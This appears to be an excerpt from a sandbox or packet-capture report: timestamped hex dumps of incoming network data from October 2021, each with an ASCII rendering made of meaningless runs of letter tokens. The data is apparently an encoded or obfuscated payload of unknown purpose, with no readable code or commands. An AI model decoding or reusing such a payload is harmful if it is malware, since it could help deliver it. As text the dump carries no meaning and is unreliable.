                                                            2021-10-29 18:10:44 UTC1338INData Raw: 72 20 49 72 20 4e 4e 49 20 57 4c 20 57 43 20 4e 4e 56 20 59 43 20 59 49 20 63 59 20 4e 72 20 49 72 20 4e 4e 72 20 4e 56 4d 20 63 57 20 4c 43 20 59 43 20 72 49 20 59 63 20 59 56 20 72 4d 20 57 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 4c 59 20 59 49 20 4c 59 20 59 57 20 4e 56 20 57 57 20 4e 56 4c 20 4e 56 4c 20 56 4c 43 20 4e 43 63 20 4c 4c 20 63 43 20 4c 4c 20 4e 57 72 20 72 56 20 4e 43 43 20 57 57 20 4e 43 72 20 4e 63 72 20 4e 43 72 20 4c 59 20 59 63 20 4d 4d 20 56 56 49 20 72 59 20 72 20 57 4d 20 63 43 20 72 56 20 4e 63 72 20 57 59 20 59 57 20 4e 56 49 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 4d 57 20 56 72 20 59 43 20 59 72 20 49 43 20 4d 72 20 56 4c 59 20 4e 43 57 20 4e 4e 56 20 59 43 20 59 43 20 4d 4c 20 59 4d 20 49 72 20 4e 4e 72 20 4e 4e 4c 20 4e 4e
                                                            Data Ascii: r Ir NNI WL WC NNV YC YI cY Nr Ir NNr NVM cW LC YC rI Yc YV rM WI NNM NCW NNc LY YI LY YW NV WW NVL NVL VLC NCc LL cC LL NWr rV NCC WW NCr Ncr NCr LY Yc MM VVI rY r WM cC rV Ncr WY YW NVI NNM NCW NVV MW Vr YC Yr IC Mr VLY NCW NNV YC YC ML YM Ir NNr NNL NN
                                                            2021-10-29 18:10:44 UTC1342INData Raw: 63 20 4e 4e 59 20 4e 4e 72 20 56 63 20 49 56 20 59 43 20 59 72 20 57 72 20 49 49 20 57 57 20 4e 4e 43 20 4e 43 72 20 56 43 72 20 72 57 20 56 72 20 59 72 20 49 72 20 4e 43 59 20 63 57 20 4e 43 72 20 4e 4e 56 20 63 4d 20 72 49 20 59 43 20 59 72 20 4e 4e 4e 20 4e 4e 72 20 4e 4e 4d 20 4e 56 72 20 4e 4e 59 20 57 4c 20 4e 59 4c 20 59 4e 20 59 72 20 49 56 20 4e 43 4e 20 56 72 49 20 59 4c 20 4e 4e 56 20 59 43 20 72 57 20 56 4c 20 4c 56 20 4c 49 20 4e 4d 56 20 4e 4e 72 20 4e 43 57 20 43 20 4e 72 72 20 4c 57 20 57 4c 20 4e 56 43 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 43 4c 20 4c 20 59 4e 20 72 57 20 59 43 20 63 43 20 49 56 20 4e 43 43 20 56 4c 57 20 4e 43 4d 20 4e 43 4c 20 4e 63 49 20 56 72 20 49 4e 20 59 72 20 49 72 20 4e 56 43 20 57 4c 20 4e 4e 4e 20 4e 4e 4c 20
                                                            Data Ascii: c NNY NNr Vc IV YC Yr Wr II WW NNC NCr VCr rW Vr Yr Ir NCY cW NCr NNV cM rI YC Yr NNN NNr NNM NVr NNY WL NYL YN Yr IV NCN VrI YL NNV YC rW VL LV LI NMV NNr NCW C Nrr LW WL NVC Ir NNr NVM NCL L YN rW YC cC IV NCC VLW NCM NCL NcI Vr IN Yr Ir NVC WL NNN NNL
                                                            2021-10-29 18:10:44 UTC1346INData Raw: 56 4c 20 56 57 20 63 56 20 4e 63 20 4d 43 20 4e 4e 56 20 4e 4c 57 20 4e 56 43 20 63 4d 20 59 43 20 72 49 20 72 4e 20 63 56 20 4e 56 4d 20 59 57 20 4e 4e 20 4e 56 4c 20 4e 4e 4c 20 59 43 20 59 56 20 56 4c 20 56 4d 20 63 4d 20 49 72 20 4e 4e 20 4e 56 4e 20 4e 4e 4c 20 59 43 20 59 56 20 56 43 72 20 72 49 20 4d 56 20 4e 4e 56 20 4e 4e 4d 20 4e 43 4d 20 4c 20 72 4e 20 72 57 20 59 43 20 63 43 20 4e 4e 4c 20 56 72 56 20 57 57 20 4e 43 49 20 4e 4e 56 20 59 72 20 56 72 20 72 59 20 59 72 20 49 72 20 49 57 20 49 43 20 63 72 20 4e 56 72 20 56 43 20 4c 72 20 72 49 20 56 43 43 20 63 59 20 63 59 20 4e 4e 4d 20 4e 43 57 20 4e 43 4d 20 59 49 20 56 4d 20 4c 63 20 72 49 20 4e 4d 43 20 4e 4e 63 20 4e 43 57 20 4e 4e 4e 20 4e 4e 56 20 59 56 20 63 4d 20 72 4d 20 59 59 20 49 72
                                                            Data Ascii: VL VW cV Nc MC NNV NLW NVC cM YC rI rN cV NVM YW NN NVL NNL YC YV VL VM cM Ir NN NVN NNL YC YV VCr rI MV NNV NNM NCM L rN rW YC cC NNL VrV WW NCI NNV Yr Vr rY Yr Ir IW IC cr NVr VC Lr rI VCC cY cY NNM NCW NCM YI VM Lc rI NMC NNc NCW NNN NNV YV cM rM YY Ir
                                                            2021-10-29 18:10:44 UTC1349INData Raw: 20 4e 4c 49 20 49 72 20 4e 4e 72 20 4e 56 4d 20 56 43 4d 20 49 59 20 4c 4d 20 4c 57 20 4c 49 20 4c 43 20 56 4c 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 56 4e 43 20 56 4c 20 72 43 20 4c 4d 20 4c 72 20 4e 56 72 20 56 43 63 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 4e 72 72 20 56 4e 20 72 4c 20 4c 56 20 63 72 20 57 43 20 56 43 4e 20 4e 43 57 20 4e 4e 56 20 59 63 20 4e 72 63 20 56 63 20 4e 4c 57 20 49 72 20 4e 4e 72 20 4e 56 4d 20 63 57 20 72 57 20 59 4e 20 72 49 20 59 63 20 4e 49 56 20 4d 4c 20 4e 4e 59 20 4e 4e 4d 20 4e 43 59 20 4e 72 20 72 4d 20 72 57 20 59 43 20 59 43 20 72 4d 20 72 49 20 4e 4e 63 20 4e 43 57 20 4e 56 56 20 4d 63 20 72 59 20 59 4e 20 59 72 20 49 43 20 4e 56 56 20 57 57 20 4e 56 4c 20 4c 20 4e 4e 4c 20 72 57 20 59 43 20 63 43 20 63 63 20 4e
                                                            Data Ascii: NLI Ir NNr NVM VCM IY LM LW LI LC VLV NNr NNM NCL VNC VL rC LM Lr NVr VCc NNM NCW NVV Nrr VN rL LV cr WC VCN NCW NNV Yc Nrc Vc NLW Ir NNr NVM cW rW YN rI Yc NIV ML NNY NNM NCY Nr rM rW YC YC rM rI NNc NCW NVV Mc rY YN Yr IC NVV WW NVL L NNL rW YC cC cc N
                                                            2021-10-29 18:10:44 UTC1354INData Raw: 4d 56 20 4e 43 57 20 59 43 20 4d 4d 20 72 49 20 72 57 20 63 43 20 49 72 20 4e 4e 72 20 4e 4e 63 20 4e 4e 4e 20 4e 4e 56 20 56 49 20 72 49 20 4e 43 49 20 4e 49 63 20 49 72 20 4e 56 43 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 59 43 20 59 43 20 4e 4d 20 49 72 20 4c 20 56 4c 4d 20 4e 43 57 20 4e 56 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 63 20 4e 4e 72 20 49 59 20 4e 43 57 20 56 72 72 20 4e 59 43 20 72 49 20 59 63 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 56 20 72 49 20 4e 59 56 20 4e 4c 72 20 49 72 20 4e 4e 4c 20 4e 56 4d 20 4e 43 57 20 4e 4e 56 20 59 4e 20 72 4c 20 56 20 59 4e 20 49 72 20 4e 63 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 56 4e 20 72 49 20 59 43 20 4c 57 20 4c 57 20 56 4e 63 20 4e 4e 4d 20 4e 43 57
                                                            Data Ascii: MV NCW YC MM rI rW cC Ir NNr NNc NNN NNV VI rI NCI NIc Ir NVC NNM NCW NNV YC YC YC NM Ir L VLM NCW NVV YC rI YC Yr Ic NNr IY NCW Vrr NYC rI Yc Yr Ir NNr NNM NCW NNV YV rI NYV NLr Ir NNL NVM NCW NNV YN rL V YN Ir NcY NNM NCW NNV NVN rI YC LW LW VNc NNM NCW
                                                            2021-10-29 18:10:44 UTC1358INData Raw: 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 59 43 20 72 49 20 59 43 20 4e 59 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 63 72 20 4e 4e 4c 20 59 43 20 72 49 20 49 72 20 59 59 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 56 20 72 49 20 59 43 20 59 72 20 59 63 20 4e 4e 59 20 4e 4e 4d 20 4e 43 57 20 56 20 59 4e 20 72 49 20 59 43 20 59 4c 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 4e 4e 56 20 59 43 20 72 57 20 72 4e 20 63 20 49 4e 20 4e 4e 72 20 56 72 43 20 4e 4e 4e 20 4e 4e 56 20 59 43 20 4e 56 4d 20 59 43 20 59 72 20 63 57 20 4e 20 56 4e 43 20 4e 43 57 20 4e 4e 56 20 59 63 20 59 49 20 4e 49 20 4e 49 4d 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 56 56 72 20 72 56
                                                            Data Ascii: NNM NCW NNr YC rI YC NY Ir NNr NNM cr NNL YC rI Ir YY Ir NNr NVM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YV rI YC Yr Yc NNY NNM NCW V YN rI YC YL Ir NNr NNM NCL NNV YC rW rN c IN NNr VrC NNN NNV YC NVM YC Yr cW N VNC NCW NNV Yc YI NI NIM Ir NNr NNM VVr rV
                                                            2021-10-29 18:10:44 UTC1362INData Raw: 56 20 59 63 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 56 20 4e 4e 4d 20 4c 63 20 4e 4e 56 20 4e 4d 49 20 56 72 57 20 59 43 20 63 43 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 59 43 20 4e 4e 72 20 59 43 20 4e 63 59 20 4e 56 57 20 4e 4e 72 20 4e 56 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 56 20 4e 4e 72 20 4e 4d 72 20 4e 72 43 20 4e 4e 56 20 72 57 20 59 49 20 59 43 20 59 72 20 49 59 20 4e 43 59 20 63 57 20 4e 43 72 20 4e 4e 56 20 4e 43 49 20 72 57 20 59 43 20 59 72 20 72 20 4e 4e 72 20 4e 4e 4d 20 4e 56 72 20 4c 20 4e 72 57 20 72 49 20 59 43 20 63 43 20 57 72 20 4e 43 57 20 4d 43 20 56 56 72 20 72 56 20 59 43 20 72 49 20 59 4e 20 4e 57 20 4e 4c 56 20 4e 63 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 56 63 20 4d
                                                            Data Ascii: V Yc rI YC Yr Ir NNV NNM Lc NNV NMI VrW YC cC Ir NNr NNM NCW NNr YC NNr YC NcY NVW NNr NVM NCW NNV YC rI YC Yr IV NNr NMr NrC NNV rW YI YC Yr IY NCY cW NCr NNV NCI rW YC Yr r NNr NNM NVr L NrW rI YC cC Wr NCW MC VVr rV YC rI YN NW NLV NcY NNM NCW NNc Vc M
                                                            2021-10-29 18:10:44 UTC1366INData Raw: 4d 20 4e 43 20 59 72 20 49 72 20 4e 56 43 20 56 63 20 4e 49 49 20 4e 4e 56 20 59 43 20 59 49 20 59 56 20 72 4e 20 57 43 20 56 59 59 20 72 4d 20 4e 43 57 20 4e 4e 56 20 59 4e 20 56 4e 20 56 56 63 20 56 72 59 20 49 72 20 4e 4e 72 20 4e 4e 4c 20 63 57 20 4d 4e 20 59 43 20 72 49 20 59 63 20 63 57 20 4e 43 49 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 4c 4e 20 56 56 4d 20 72 49 20 59 43 20 63 43 20 4c 57 20 56 4e 4c 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 59 4d 20 59 4c 20 4c 43 20 63 56 20 49 4e 20 56 59 56 20 49 57 20 4e 43 59 20 4e 4e 63 20 72 57 20 4e 20 72 49 20 72 57 20 4e 56 63 20 4e 4e 72 20 4e 4e 57 20 63 57 20 4e 63 56 20 59 43 20 72 49 20 59 63 20 59 49 20 63 63 20 4e 56 4d 20 4d 4d 20 4e 56 72 20 4e 4e 4c 20 59 43 20 72 49 20 59 49 20 63 4c 20 56 43 63
                                                            Data Ascii: M NC Yr Ir NVC Vc NII NNV YC YI YV rN WC VYY rM NCW NNV YN VN VVc VrY Ir NNr NNL cW MN YC rI Yc cW NCI NNr NNM NCL LN VVM rI YC cC LW VNL NNM NCW NVV YM YL LC cV IN VYV IW NCY NNc rW N rI rW NVc NNr NNW cW NcV YC rI Yc YI cc NVM MM NVr NNL YC rI YI cL VCc
                                                            2021-10-29 18:10:44 UTC1370INData Raw: 43 20 59 56 20 56 72 20 56 43 20 49 63 20 4e 4e 4c 20 49 20 57 72 20 4e 4e 56 20 59 43 20 59 56 20 56 72 20 72 43 20 49 63 20 57 20 63 59 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 63 20 4e 63 20 59 56 20 49 4d 20 4e 59 20 63 59 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 63 20 72 72 20 59 56 20 72 4d 20 4d 4e 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 56 72 20 4e 49 20 72 49 20 59 4c 20 72 4e 20 4d 4e 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 56 72 20 72 63 20 72 49 20 4d 4d 20 57 49 20 4e 4e 72 20 4e 4e 4d 20 4e 43 59 20 57 43 20 4e 63 20 59 43 20 72 57 20 4d 59 20 57 49 20 4e 4e 72 20 4e 4e 4d 20 4e 43 59 20 57 43 20 72 72 20 59 43 20 4d 4c 20 4e 20 49 72 20 4e 4e 72 20 4e 4e 4c 20 4d 4e 20 49 56 20 72 49 20 59 4e 20 4d 57 20 4e 20 49 72 20 4e 4e 72 20 4e 4e 4c 20 4d
                                                            Data Ascii: C YV Vr VC Ic NNL I Wr NNV YC YV Vr rC Ic W cY NCW NNV Yr Vc Nc YV IM NY cY NCW NNV Yr Vc rr YV rM MN NNM NCW NNc Vr NI rI YL rN MN NNM NCW NNc Vr rc rI MM WI NNr NNM NCY WC Nc YC rW MY WI NNr NNM NCY WC rr YC ML N Ir NNr NNL MN IV rI YN MW N Ir NNr NNL M
                                                            2021-10-29 18:10:44 UTC1374INData Raw: 20 4e 4e 56 20 57 4c 20 4e 59 20 4e 4e 56 20 59 43 20 59 49 20 56 72 20 72 43 20 49 63 20 57 20 57 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 63 20 4e 63 20 59 56 20 49 4d 20 4e 59 20 57 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 63 20 72 72 20 59 56 20 72 4d 20 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 56 72 20 4e 49 20 72 49 20 59 4c 20 72 4e 20 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 56 72 20 72 63 20 72 49 20 4d 4d 20 72 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 59 20 57 43 20 4e 63 20 59 43 20 72 57 20 4d 59 20 72 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 59 20 57 43 20 72 72 20 59 43 20 56 63 20 49 72 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4d 4e 20 4e 4e 43 20 72 49 20 4d 59 20 4d 4d 20 59 72 20 49 72 20 4e 4e 49 20 57 59 20 4d 57 20 4e 4e 72 20 72 57 20 4d 4d 20
                                                            Data Ascii: NNV WL NY NNV YC YI Vr rC Ic W W NCW NNV Yr Vc Nc YV IM NY W NCW NNV Yr Vc rr YV rM NY NNM NCW NNc Vr NI rI YL rN NY NNM NCW NNc Vr rc rI MM rV NNr NNM NCY WC Nc YC rW MY rV NNr NNM NCY WC rr YC Vc Ir Ir NNr NVM MN NNC rI MY MM Yr Ir NNI WY MW NNr rW MM
                                                            2021-10-29 18:10:44 UTC1378INData Raw: 57 59 20 59 4d 20 59 72 20 49 72 20 4e 56 43 20 4e 63 57 20 4e 4d 57 20 4e 4e 59 20 56 43 20 56 4c 49 20 59 43 20 4c 63 20 49 63 20 57 43 20 56 4e 59 20 4e 43 49 20 4e 4e 56 20 59 63 20 4e 43 20 4e 56 43 20 56 43 4e 20 4e 4d 4e 20 4e 72 4e 20 4e 4d 4e 20 57 57 20 57 49 20 72 49 20 56 43 63 20 4c 63 20 4e 4e 72 20 49 72 20 4e 4e 72 20 4e 4e 43 20 56 20 4e 56 4c 20 59 43 20 72 49 20 59 63 20 56 4c 72 20 49 63 20 4e 20 56 4c 49 20 4e 43 49 20 4e 4e 56 20 59 56 20 4c 59 20 59 49 20 4c 57 20 57 56 20 57 43 20 57 20 4e 43 57 20 4e 4e 56 20 59 63 20 59 59 20 57 4c 20 4e 4d 4d 20 49 72 20 4e 4e 72 20 4e 56 4d 20 56 20 43 20 59 43 20 72 49 20 59 63 20 49 57 20 56 72 63 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 57 4d 20 59 49 20 72 4d 20 56 43 20 4e 49 4d 20 4e 72 20
                                                            Data Ascii: WY YM Yr Ir NVC NcW NMW NNY VC VLI YC Lc Ic WC VNY NCI NNV Yc NC NVC VCN NMN NrN NMN WW WI rI VCc Lc NNr Ir NNr NNC V NVL YC rI Yc VLr Ic N VLI NCI NNV YV LY YI LW WV WC W NCW NNV Yc YY WL NMM Ir NNr NVM V C YC rI Yc IW Vrc NNY NNM NCM WM YI rM VC NIM Nr
                                                            2021-10-29 18:10:44 UTC1381INData Raw: 4e 4e 57 20 4e 4e 49 20 59 43 20 4c 43 20 59 72 20 4e 4c 43 20 4d 49 20 4e 4e 63 20 4e 4e 4d 20 4d 4d 20 4e 4e 63 20 4e 4c 72 20 72 56 20 56 57 20 59 72 20 72 4c 20 4d 43 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 59 43 20 56 72 4d 20 56 57 20 63 49 20 4e 56 43 20 4e 4e 63 20 4e 4e 4d 20 4d 43 20 49 56 20 63 72 20 56 49 20 59 56 20 59 72 20 4e 4c 72 20 4e 4e 4c 20 4d 20 63 59 20 4e 4e 49 20 59 43 20 4e 72 43 20 59 56 20 63 49 20 4e 56 43 20 4e 4e 63 20 4e 4e 4d 20 56 4c 4c 20 49 59 20 4e 72 59 20 59 20 63 43 20 59 72 20 56 56 49 20 63 4d 20 4e 72 4d 20 4d 43 20 4e 4e 49 20 59 43 20 56 43 43 20 4e 20 4d 63 20 4e 4e 43 20 4e 4e 63 20 4e 4e 4d 20 56 72 4d 20 49 43 20 63 72 20 56 49 20 63 43 20 59 72 20 4e 49 63 20 4e 43 57 20 4e 72 4d 20 4d 43 20 4e 4e 49 20 59
                                                            Data Ascii: NNW NNI YC LC Yr NLC MI NNc NNM MM NNc NLr rV VW Yr rL MC NNM NCW NNI YC VrM VW cI NVC NNc NNM MC IV cr VI YV Yr NLr NNL M cY NNI YC NrC YV cI NVC NNc NNM VLL IY NrY Y cC Yr VVI cM NrM MC NNI YC VCC N Mc NNC NNc NNM VrM IC cr VI cC Yr NIc NCW NrM MC NNI Y
                                                            2021-10-29 18:10:44 UTC1386INData Raw: 4e 43 72 20 4e 4e 72 20 4e 56 72 20 4e 43 57 20 56 4c 20 59 43 20 72 57 20 59 4e 20 59 72 20 49 72 20 4e 57 4e 20 4d 4c 20 4e 43 57 20 4e 4e 56 20 57 59 20 72 49 20 59 57 20 59 72 20 56 4e 4c 20 4e 4e 72 20 56 72 72 20 4e 43 57 20 57 63 20 59 43 20 4e 49 59 20 4e 4d 20 59 72 20 49 72 20 57 4e 20 4e 4e 4d 20 4e 43 43 20 4e 4e 56 20 4e 49 4c 20 72 49 20 4e 4d 57 20 59 59 20 63 49 20 4e 4e 72 20 63 63 20 72 63 20 4e 4e 56 20 59 43 20 56 59 20 59 43 20 63 4e 20 49 72 20 56 72 57 20 4e 4e 4d 20 56 4c 63 20 4e 4e 4c 20 4c 72 20 72 49 20 4e 57 43 20 4d 20 49 72 20 4e 4e 72 20 57 56 20 4e 43 57 20 4e 56 4c 20 59 43 20 4e 49 49 20 59 43 20 4e 49 4c 20 49 59 20 57 49 20 4e 4e 4d 20 4e 49 59 20 49 49 20 59 43 20 72 49 20 56 4d 20 59 72 20 57 59 20 4e 4e 72 20 56 72
                                                            Data Ascii: NCr NNr NVr NCW VL YC rW YN Yr Ir NWN ML NCW NNV WY rI YW Yr VNL NNr Vrr NCW Wc YC NIY NM Yr Ir WN NNM NCC NNV NIL rI NMW YY cI NNr cc rc NNV YC VY YC cN Ir VrW NNM VLc NNL Lr rI NWC M Ir NNr WV NCW NVL YC NII YC NIL IY WI NNM NIY II YC rI VM Yr WY NNr Vr
                                                            2021-10-29 18:10:44 UTC1390INData Raw: 63 20 4d 56 20 4e 4e 72 20 4c 4c 20 72 57 20 59 43 20 59 72 20 4e 43 20 4e 56 4c 20 4e 4e 4d 20 4e 43 57 20 72 4e 20 59 4e 20 56 43 20 59 4e 20 4e 57 20 49 63 20 57 4d 20 4e 4e 63 20 4e 43 57 20 4e 4e 56 20 4d 4e 20 63 4c 20 59 43 20 59 72 20 4e 4c 20 4e 4e 59 20 49 4e 20 4e 43 49 20 49 59 20 72 49 20 4c 59 20 59 4e 20 59 72 20 49 72 20 56 72 63 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 43 4d 20 72 57 20 56 56 20 59 59 20 4e 4e 4c 20 4e 4e 56 20 4e 43 56 20 4e 43 49 20 4e 4e 56 20 59 43 20 59 4c 20 59 59 20 59 72 20 49 72 20 72 4c 20 4e 4e 63 20 4d 4c 20 4e 4e 4c 20 56 4c 20 59 43 20 4c 4c 20 59 59 20 49 72 20 4e 4e 72 20 56 4c 4e 20 57 49 20 4e 4e 56 20 59 43 20 4e 43 59 20 59 4e 20 4e 49 20 49 59 20 49 4d 20 4e 4e 57 20 4e 56 63 20 4e 4e 4c 20 59 43 20
                                                            Data Ascii: c MV NNr LL rW YC Yr NC NVL NNM NCW rN YN VC YN NW Ic WM NNc NCW NNV MN cL YC Yr NL NNY IN NCI IY rI LY YN Yr Ir Vrc NNM NCW NNV NCM rW VV YY NNL NNV NCV NCI NNV YC YL YY Yr Ir rL NNc ML NNL VL YC LL YY Ir NNr VLN WI NNV YC NCY YN NI IY IM NNW NVc NNL YC
                                                            2021-10-29 18:10:44 UTC1394INData Raw: 43 59 20 56 4e 4e 20 4e 43 57 20 4e 4e 4c 20 59 43 20 72 72 20 72 63 20 4e 72 72 20 49 72 20 4e 4e 59 20 4e 4e 4d 20 72 56 20 4e 43 49 20 59 56 20 4c 4c 20 59 4e 20 59 72 20 72 59 20 4e 4e 4e 20 4e 43 20 4e 56 72 20 4e 4e 4c 20 59 43 20 4e 63 4c 20 72 4d 20 4e 72 72 20 49 72 20 63 59 20 4e 4e 63 20 56 56 56 20 4e 56 63 20 4e 49 56 20 4c 4c 20 4e 20 59 59 20 4e 56 20 57 49 20 56 59 56 20 4e 56 72 20 63 4d 20 59 4e 20 63 72 20 4c 49 20 4e 4d 49 20 63 57 20 63 59 20 4e 4e 63 20 4e 4e 43 20 4e 4e 57 20 4e 49 49 20 4c 4c 20 4e 20 59 59 20 4e 4d 72 20 4e 56 4d 20 56 4c 43 20 4e 56 72 20 63 4d 20 59 4e 20 4e 57 63 20 59 63 20 4e 4d 72 20 63 57 20 63 59 20 4e 4e 63 20 56 4c 4e 20 4e 56 63 20 4e 4d 59 20 4c 4c 20 4e 20 59 59 20 56 4e 4c 20 57 49 20 56 4e 59 20 4e
                                                            Data Ascii: CY VNN NCW NNL YC rr rc Nrr Ir NNY NNM rV NCI YV LL YN Yr rY NNN NC NVr NNL YC NcL rM Nrr Ir cY NNc VVV NVc NIV LL N YY NV WI VYV NVr cM YN cr LI NMI cW cY NNc NNC NNW NII LL N YY NMr NVM VLC NVr cM YN NWc Yc NMr cW cY NNc VLN NVc NMY LL N YY VNL WI VNY N
                                                            2021-10-29 18:10:44 UTC1398INData Raw: 72 49 20 59 43 20 59 72 20 4e 4d 49 20 4e 4e 59 20 4e 49 72 20 4d 49 20 4e 4e 4c 20 59 43 20 63 20 59 43 20 49 56 20 4e 43 57 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 63 72 20 72 49 20 4e 57 4c 20 57 20 4e 49 43 20 57 4d 20 63 4d 20 4e 43 57 20 4e 57 56 20 4e 4e 20 72 49 20 59 43 20 59 72 20 49 72 20 56 56 4d 20 4e 4e 4d 20 4e 59 49 20 4d 57 20 56 4e 4c 20 4c 59 20 4e 43 20 59 72 20 4e 56 20 4d 56 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 4d 4d 20 59 43 20 4e 43 4d 20 4e 43 59 20 4e 4c 43 20 4e 43 56 20 49 4d 20 4e 4e 56 20 4e 72 20 4e 4e 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 56 72 72 20 4e 43 57 20 4e 57 4d 20 56 4e 20 56 43 4d 20 4c 4c 20 57 20 49 72 20 4e 72 20 4d 49 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 4e 4d 57 20 59
                                                            Data Ascii: rI YC Yr NMI NNY NIr MI NNL YC c YC IV NCW NNr NNM NCW NNV Ncr rI NWL W NIC WM cM NCW NWV NN rI YC Yr Ir VVM NNM NYI MW VNL LY NC Yr NV MV NNM NCW NNV YC NMM YC NCM NCY NLC NCV IM NNV Nr NN YC Yr Ir NNr Vrr NCW NWM VN VCM LL W Ir Nr MI NCW NNV YC rI NMW Y
                                                            2021-10-29 18:10:44 UTC1402INData Raw: 20 59 43 20 59 49 20 4e 43 63 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 56 59 4e 20 4e 4e 56 20 4e 43 49 20 72 63 20 56 56 4c 20 4c 72 20 4e 72 4c 20 4e 4e 72 20 4e 43 59 20 59 4c 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 4e 63 43 20 49 72 20 4e 56 57 20 4e 4e 59 20 4e 56 49 20 4e 43 43 20 56 4c 63 20 72 49 20 49 20 4e 4e 43 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 56 4c 43 20 59 43 20 72 4d 20 4c 20 56 4e 57 20 63 72 20 4e 72 4d 20 4e 4e 4d 20 4c 4c 20 72 43 20 59 43 20 72 49 20 59 43 20 59 72 20 4e 57 72 20 4e 4e 72 20 57 20 72 72 20 4e 59 4d 20 4c 49 20 56 4e 56 20 59 43 20 4e 43 72 20 4e 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 63 72 20 72 49 20 4e 4e 43 20 72 57 20 4e 49 59 20 4e 43 56 20 4e 72 63 20 4e 43 57 20 72 20 4e 43
                                                            Data Ascii: YC YI NCc Yr Ir NNr NNM VYN NNV NCI rc VVL Lr NrL NNr NCY YL NNV YC rI YC NcC Ir NVW NNY NVI NCC VLc rI I NNC Ir NNr NNM NCW VLC YC rM L VNW cr NrM NNM LL rC YC rI YC Yr NWr NNr W rr NYM LI VNV YC NCr NV NNr NNM NCW NNV Ncr rI NNC rW NIY NCV Nrc NCW r NC
                                                            2021-10-29 18:10:44 UTC1406INData Raw: 4e 56 20 59 43 20 4e 63 63 20 59 43 20 4e 72 57 20 4e 43 72 20 4e 56 72 20 57 57 20 4c 4c 20 4e 4e 4c 20 59 43 20 4e 49 4c 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 56 56 4d 20 4e 43 57 20 4e 72 57 20 56 72 20 4c 49 20 4c 63 20 4e 56 43 20 49 59 20 56 72 4e 20 56 72 56 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 4e 63 72 20 63 56 20 56 57 20 4e 43 4d 20 4e 43 72 20 4e 56 4c 20 63 4c 20 59 4e 20 4e 56 49 20 4e 49 4e 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 56 59 4e 20 4e 4e 56 20 57 63 20 72 4e 20 4e 4d 20 4c 56 20 56 4d 20 4e 4e 59 20 4e 4c 4c 20 56 4c 72 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 4e 63 43 20 49 72 20 72 4e 20 4e 43 49 20 4e 49 43 20 4e 56 59 20 57 49 20 72 57 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 56 72 59 20 4e 43 57 20 56 56 59
                                                            Data Ascii: NV YC Ncc YC NrW NCr NVr WW LL NNL YC NIL YC Yr Ir NNr VVM NCW NrW Vr LI Lc NVC IY VrN VrV NCW NNV YC rI Ncr cV VW NCM NCr NVL cL YN NVI NIN Yr Ir NNr NNM VYN NNV Wc rN NM LV VM NNY NLL VLr NNV YC rI YC NcC Ir rN NCI NIC NVY WI rW YC Yr Ir NNr VrY NCW VVY
